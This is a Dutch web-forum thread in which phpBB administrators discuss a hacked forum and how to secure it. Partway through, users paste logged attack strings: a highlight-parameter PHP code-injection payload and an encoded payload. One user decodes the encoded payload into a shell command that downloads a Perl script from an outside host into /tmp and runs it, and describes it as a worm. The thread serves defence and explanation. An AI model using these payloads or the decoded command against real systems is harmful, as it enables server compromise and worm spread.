het voorkomen van hackers ????

[richard m]

hoi,

Mijn forum is laatst gehackt.
De hacker is in mijn adminpanel binnen gedrongen,
waarna hij topics begon te verwijderen en alle users.
Ik kan mn forum nu niet meer binnen. Ik heb het van de server afgehaald.
Hoe kan ik nu voorkomen dat mn forum word gehackt ??
Ik had zelfs de laatste update van phpbb uitgevoerd!

[Coen]

Zorgen dat je forum altijd up-to-date is met de nieuwste phpBB versie maakt de kans op een aanval zo klein mogelijk...

[richard m]

maar zijn er misschien ook beveiligings mod's

en weten jullie misschien hoe een hacker in de account van een admin komt??

[Paul]

Welke versie van phpbb gebruikte je?

[Just me...]

Hoe kan ik nu voorkomen dat mn forum word gehackt ??

Nooit geen paswoorden doorgeven, zeker niet van ftp programma's
Nooit premodded files gebruiken, ze zijn onbetrouwbaar (ik zeg niet allemaal, maar meestal toch)

maar zijn er misschien ook beveiligings mod's

er zijn er genoeg, kijk maar eens op http://www.phphacks.com
zoek eens in de categorieën, daar moet je er wel tegenkomen.

en weten jullie misschien hoe een hacker in de account van een admin komt??

Dat zal ik niet zeggen voordat iedereen denkt dat ik een hacker ben

[Paul]

Ik ben ook geen hacker, maar ik kan het soms toch
En waarom zou je geen premodded gebruiken? Een aantal zijn even goed als de normale phpbb kwa beveiliging

[Just me...]

Ik ben ook geen hacker, maar ik kan het soms toch
En waarom zou je geen premodded gebruiken? Een aantal zijn even goed als de normale phpbb kwa beveiliging

kenissen met slechte ervaringen

[Paul]

Welke premodded dan? phpbbfm ofzo zeker

[Stef]

Even voor de duidelijkheid, de suggestie word gewekt dat sommige in het admin paneel kunnen komen. Maar dit kan men alleen als het forum niet up-to-date is of de admin het wachtwoord laat slingeren of erg logisch is.

[Robru]

maar zijn er misschien ook beveiligings mod's

Een extra beveiliging in de vorm van CrackerTracker van CBack is bij mij een welkome aanvulling gebleken.
Regelmatig worden dit soort pogingen gelogd op mijn phpbb 2.0.17 versie:

Code: Selecteer alles

23.08.2005, 15:07 64.203.x.x Mozilla/4.0  p=22365&highlight=\'.system(getenv(http_php)).\' 

[Paul]

Enkele tijd geledenen gebeurde dat elke minuut, alleen werden er maar een paar door de ctracker geconstateerd en blokeert. Hij ziet ze dus niet altijd

[Robru]

Oké, dat kan ik begrijpen, al is het wel zo dat zij iedere maand met nieuwe automatische updates uitkomen...
Maar het is toch tegen niet onverstanding om deze en andere beveiligings MODS te installeren?
'Niet geschoten, is altijd mis!'

[Paul]

Das wel waar, maar hetgeen ik wil zeggen is, dat deze niet 100% waterdicht zijn.

[Montana]

vaak is het zo...

als je iets echt wil lukt het toch wel
is het met hacken of diefstal of wat dan ook...

[Paul]

Ik geloof voor sommige wel

[mosymuis]

Hoe kan ik nu voorkomen dat mn forum word gehackt ??

Nu je weet dat er mensen zijn binnen gekomen, is het zaak alle wachtwoorden te wijzigen. Database, Control Panel, FTP accounts, admin accounts. Daarnaast ga je na of er extra scripts zijn geinstalleerd op je webserver (hier kan je je host ook om vragen) en of er verborgen admin gebruikers zijn (SELECT username FROM phpbb_users WHERE user_level=1;).

maar zijn er misschien ook beveiligings mod's

http://www.phpbb.nl/viewtopic.php?t=7829

[ik ben gek]

goed topic mossymuis... binnenkort wat te doen

[Php]

Dat CTRACKER is inderdaad een goed hulpmiddel zeg. Zo had ik gisteren 59 aanvallen in het logbestand staan, en vandaag al 140.

Soms staat er duidelijk "drop table" in de aanval, maar meestal zijn het codes als deze, geen idee wat het betekent.

Code: Selecteer alles

p=3602&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)
%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(119)
%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)
%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)%252echr(114)
%252echr(105)%252echr(120)%252echr(105)%252echr(116)%252echr(46)%252echr(99)
%252echr(111)%252echr(109)%252echr(46)%252echr(97)%252echr(117)%252echr(47)
%252echr(112)%252echr(111)%252echr(114)%252echr(116)%252echr(97)%252echr(46)
%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(111)%252echr(114)
%252echr(116)%252echr(97)%252echr(46)%252echr(116)%252echr(120)%252echr(116))
%252e%2527

[Php]

Er is overigens ook een hack voor het telkens opnieuw versleutelen van wachtwoorden:

http://www.phpbbhacks.com/download/5586

[mosymuis]

Soms staat er duidelijk "drop table" in de aanval, maar meestal zijn het codes als deze, geen idee wat het betekent.

Code: Selecteer alles

system(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)
%252echr(109)%252echr(112)%252echr(59)%252echr(119)%252echr(103)
%252echr(101)%252echr(116)%252echr(32)%252echr(104)%252echr(116)
%252echr(116)%252echr(112)%252echr(58)%252echr(47)%252echr(47)
%252echr(114)%252echr(105)%252echr(120)%252echr(105)%252echr(116)
%252echr(46)%252echr(99)%252echr(111)%252echr(109)%252echr(46)
%252echr(97)%252echr(117)%252echr(47)%252echr(112)%252echr(111)
%252echr(114)%252echr(116)%252echr(97)%252echr(46)%252echr(116)
%252echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)
%252echr(114)%252echr(108)%252echr(32)%252echr(112)%252echr(111)
%252echr(114)%252echr(116)%252echr(97)%252echr(46)%252echr(116)
%252echr(120)%252echr(116))

Hier staat:

Code: Selecteer alles

system('cd /tmp;w get http://rixit.com.au/porta.txt;perl porta.txt')

"w get" moet aan elkaar, maar komt niet door de phpbb.nl veiligheidscontrole?

Wat zoveel betekent als: voer deze shell commando's uit > navigeer naar de temporary directory > download "http://rixit.com.au/porta.txt" en sla deze op in de huidige directory > voer het zojuist gedownloade bestand "porta.txt" uit met de Perl compiler. Het gaat hier dus een worm, welke automatisch de instructies op het genoemde webadres laat uitvoeren en zo een keten van phpbb forums hackt.